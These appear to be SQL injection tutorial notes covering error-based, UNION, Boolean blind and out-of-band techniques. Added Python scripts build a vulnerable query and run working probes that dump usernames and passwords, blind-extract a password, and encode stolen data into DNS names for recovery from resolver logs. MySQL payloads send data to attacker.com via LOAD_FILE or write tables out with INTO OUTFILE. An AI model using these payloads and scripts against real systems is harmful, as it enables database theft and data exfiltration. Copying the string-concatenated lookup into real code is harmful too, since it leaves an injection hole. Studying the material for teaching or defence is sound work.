SQLi types

In Band (Classic)

The payload is sent and its result is observed directly in the response.

  • E.g. the attacker ends up logged in, data is displayed in the page, or a table is dropped.

In-band means that the result arrives over the same channel that carried the payload (here, the HTTP response to the injected request).

As seen previously in the examples.

In Band - Error Based

Relies on the server returning a database error to the client.

  • Detecting the existence of an SQLi only requires provoking a syntax error, e.g. with a single quote: '

Used when the service executes the query but does not display enough of its output to read the data directly: the error message becomes the channel.

Detection using a single quote: http://site.com/items.php?id=2'

Or extracting data: id=2 OR CAST(NULLIF(CURRENT_USER, 'admin') AS INT)

  • If CURRENT_USER is 'admin', NULLIF returns NULL, which CASTs to INT without an error.

  • If CURRENT_USER is not 'admin', NULLIF returns the user name itself; casting that string to INT fails, and the error (which in PostgreSQL echoes the offending value) reveals the answer.

  • This form is PostgreSQL syntax. MySQL's CAST(... AS SIGNED) silently returns 0 for a non-numeric string instead of failing, so the error probe has to be adapted to the DBMS in use.

In Band - Union Based

Exploits the UNION operator to append rows from other tables to the result of the original query.

Why? The tables a query reads from are fixed in its FROM clause, before the point where the payload is injected, so an injected condition alone can only filter those tables.

SELECT Users.name, Address.street FROM Users, Address
WHERE Users.address_id = Address.id AND Users.name = '$name'

Payload for $name will use the form: ' UNION SELECT col1, col2 FROM Products -- 

  • The quote closes the string literal, the trailing comment discards the rest of the original statement, and the UNION must supply exactly as many columns as the original SELECT (two here) with compatible types; SELECT * from Products only works if that table happens to have the same column count. col1 and col2 stand for two Products columns.

  • Rows from Products are brought into the result set alongside the Users/Address rows.

Blind (Inferential)

Inferential (blind) exploitation occurs when the injection still executes, but its result is not returned to the attacker:

  • Because developers suppressed error and debug output.

  • Because the query's output is never rendered; only whether it succeeded is visible (e.g. a lookup that merely decides whether a page is shown).

The existence of an SQLi is then inferred from a change in the service's behaviour:

  • Without any error being returned.

  • Without needing a login bypass or another directly visible effect.

Blind – Content-Based

Detected using payloads that force a Boolean result and comparing the two responses.

Standard request: http://site.com/items.php?id=2

  • Always true: http://site.com/items.php?id=2 and 1=1

  • Always false: http://site.com/items.php?id=2 and 1=2

If the system is vulnerable, the two requests yield different responses:

  • Always true: returns item 2, because id=2 AND TRUE is equivalent to id=2.

  • Always false: returns nothing, because id=2 AND FALSE is always false.
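The three techniques above, worked end to end against one small vulnerable lookup. This is an added example, not code from the original page: a SQLite-backed stand-in for items.php?id= that concatenates the id into its query, plus attacker-side probes for error-based detection and extraction, UNION column-count probing and extraction, and Boolean blind extraction. The schema, rows and the Users table are constructed here. Because SQLite's CAST never fails, the conditional-error probe uses abs() of the smallest 64-bit integer (which raises "integer overflow") in place of the page's NULLIF/CAST trick.

```python
"""Added example (not from the page): a vulnerable lookup and the probes
used against it. Schema and data are constructed for this example."""
import sqlite3
import string


def make_db():
    """Constructed sample database: an item catalogue plus a Users table."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE Items(id INTEGER PRIMARY KEY, title TEXT);
        INSERT INTO Items VALUES (1, 'first'), (2, 'second'), (3, 'third');
        CREATE TABLE Users(id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        INSERT INTO Users VALUES (1, 'admin', 's3cret'), (2, 'bob', 'hunter2');
    """)
    return conn


def vulnerable_lookup(conn, item_id):
    """The vulnerable server side: ?id= is pasted straight into the SQL."""
    sql = "SELECT id, title FROM Items WHERE id = " + item_id
    return conn.execute(sql).fetchall()


# --- In band, error based ---------------------------------------------------

def detect_by_syntax_error(conn):
    """A lone quote breaks the statement; a DB error reaching the client is the tell."""
    try:
        vulnerable_lookup(conn, "2'")
    except sqlite3.OperationalError:
        return True
    return False


def error_based_check(conn, condition):
    """Conditional error: the THEN branch raises 'integer overflow' only when
    the condition holds. '+ 0*id' ties the expression to the row so SQLite
    evaluates it inside the CASE rather than once as a hoisted constant."""
    payload = ("2 AND CASE WHEN (%s) THEN abs(-9223372036854775808 + 0*id) "
               "ELSE 1 END" % condition)
    try:
        vulnerable_lookup(conn, payload)
    except sqlite3.OperationalError as err:
        if "overflow" in str(err):
            return True
        raise
    return False


# --- In band, union based ---------------------------------------------------

def union_column_count(conn, max_cols=8):
    """UNION needs as many columns as the original SELECT; add NULL
    placeholders until the database stops complaining."""
    for n in range(1, max_cols + 1):
        nulls = ", ".join(["NULL"] * n)
        try:
            vulnerable_lookup(conn, "2 UNION SELECT " + nulls)
            return n
        except sqlite3.OperationalError:
            continue
    return None


def union_dump_users(conn):
    """id=0 matches no item, so only the UNIONed Users rows come back."""
    rows = vulnerable_lookup(conn, "0 UNION SELECT username, password FROM Users")
    return sorted(rows)


# --- Blind, content based ---------------------------------------------------

def boolean_check(conn, condition):
    """True iff item 2 is still returned once the condition is ANDed in."""
    return len(vulnerable_lookup(conn, "2 AND (%s)" % condition)) == 1


def detect_blind(conn):
    """The page's always-true / always-false pair must behave differently."""
    return boolean_check(conn, "1=1") and not boolean_check(conn, "1=2")


def blind_extract(conn, expr, charset=string.printable.strip(), max_len=32):
    """Recover a string expression one character at a time, using only
    'row present / row absent' as the oracle."""
    out = ""
    for i in range(1, max_len + 1):
        for ch in charset:
            cond = "substr((%s), %d, 1) = '%s'" % (expr, i, ch.replace("'", "''"))
            if boolean_check(conn, cond):
                out += ch
                break
        else:
            break  # no character matched: end of the string
    return out


if __name__ == "__main__":
    db = make_db()
    print("error based:", detect_by_syntax_error(db),
          error_based_check(db, "(SELECT username FROM Users LIMIT 1) = 'admin'"))
    print("union:", union_column_count(db), union_dump_users(db))
    print("blind:", detect_blind(db),
          blind_extract(db, "SELECT password FROM Users WHERE username = 'admin'"))
```

The Boolean extraction costs one request per candidate character per position, which is why real tooling narrows the search with binary comparisons on unicode() rather than equality tests; the oracle itself is unchanged.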

Blind – Out-of-Band

Results in data being exfiltrated through an additional channel that the database server can reach and the attacker controls. (Not to be confused with time-based blind injection, which infers results from deliberately introduced response delays; the examples below all use a secondary channel.)

  • Data, or just the query's status, is recorded in a resource the attacker can observe.

DNS

SELECT LOAD_FILE(CONCAT('\\\\', (SELECT username FROM Users LIMIT 1), '.attacker.com\\share'));

  • Before opening the UNC path the server resolves username.attacker.com, so the attacker's authoritative DNS server logs the value. MySQL syntax: the backslashes are doubled inside the string literal, LIMIT 1 is needed because the subquery must yield a single row, the account needs the FILE privilege, and UNC resolution only happens when MySQL runs on Windows.

SMB Share

SELECT * FROM Users INTO OUTFILE '\\\\host\\share\\out.txt';

  • A file named out.txt is written to an SMB share on a host the attacker controls (again Windows MySQL with the FILE privilege, and secure_file_priv must not restrict the destination).

HTTP Dir

SELECT * FROM Users INTO OUTFILE '/var/www/out.txt';

  • File out.txt is written to a directory served over HTTP and then fetched with a normal GET. The mysqld user needs write access to the directory, secure_file_priv must allow it, and INTO OUTFILE refuses to overwrite an existing file.
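The attacker's side of the DNS channel driven by the LOAD_FILE payload above, as an added example that is not part of the original page. The database only resolves a hostname, so the leaked value has to survive as the labels of that name and is read back from the attacker's resolver log. It goes one step beyond the page's username.attacker.com form: raw values only work when they are already legal labels, so the data is hex-encoded and split into labels of at most 63 bytes (the DNS limit), and the page's raw form is just the case where no encoding was needed. The domain attacker.com is taken from the page; the log line format and the leaked values are constructed here.

```python
"""Added example (not from the page): encoding a value into a DNS name the
database can be made to resolve, and recovering it from resolver log lines.
Log format and sample values are constructed for this example."""
import binascii

ATTACKER_DOMAIN = "attacker.com"   # domain used on the page
MAX_LABEL = 63                     # RFC 1035: a DNS label is at most 63 bytes


def to_query_name(value, domain=ATTACKER_DOMAIN):
    """Hex-encode the value and split it into <=63-byte labels so any byte
    (spaces, quotes, non-ASCII) can ride inside a hostname."""
    hex_data = binascii.hexlify(value.encode("utf-8")).decode("ascii")
    labels = [hex_data[i:i + MAX_LABEL] for i in range(0, len(hex_data), MAX_LABEL)]
    return ".".join(labels + [domain])


def recover_from_log(log_lines, domain=ATTACKER_DOMAIN):
    """Pick every name under the attacker domain out of resolver log lines,
    join its data labels and decode them. Returns unique values in order of
    first appearance; names that do not decode are reported as None."""
    suffix = "." + domain
    seen, leaked = set(), []
    for line in log_lines:
        for token in line.split():
            name = token.strip("():,").rstrip(".")
            if not name.endswith(suffix) or name in seen:
                continue
            seen.add(name)
            labels = name[:-len(suffix)].split(".")
            try:
                leaked.append(binascii.unhexlify("".join(labels)).decode("utf-8"))
            except (binascii.Error, UnicodeDecodeError):
                leaked.append(None)
    return leaked


# Constructed resolver log lines (BIND-style query log); the first and third
# carry hex-encoded 'admin' and "s3cret pa'ss", the second is unrelated traffic.
SAMPLE_LOG = [
    "client 10.0.0.5#53211 (61646d696e.attacker.com): query: 61646d696e.attacker.com IN A +",
    "client 10.0.0.5#53212 (www.example.org): query: www.example.org IN A +",
    "client 10.0.0.5#53213 (733363726574207061277373.attacker.com): query: "
    "733363726574207061277373.attacker.com IN A +",
]


if __name__ == "__main__":
    print(to_query_name("admin"))
    print(recover_from_log(SAMPLE_LOG))
```

A full DNS name is limited to 253 bytes, so long values need several queries with a sequence label; the per-label split shown here is the part the page's single-query payload relies on.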
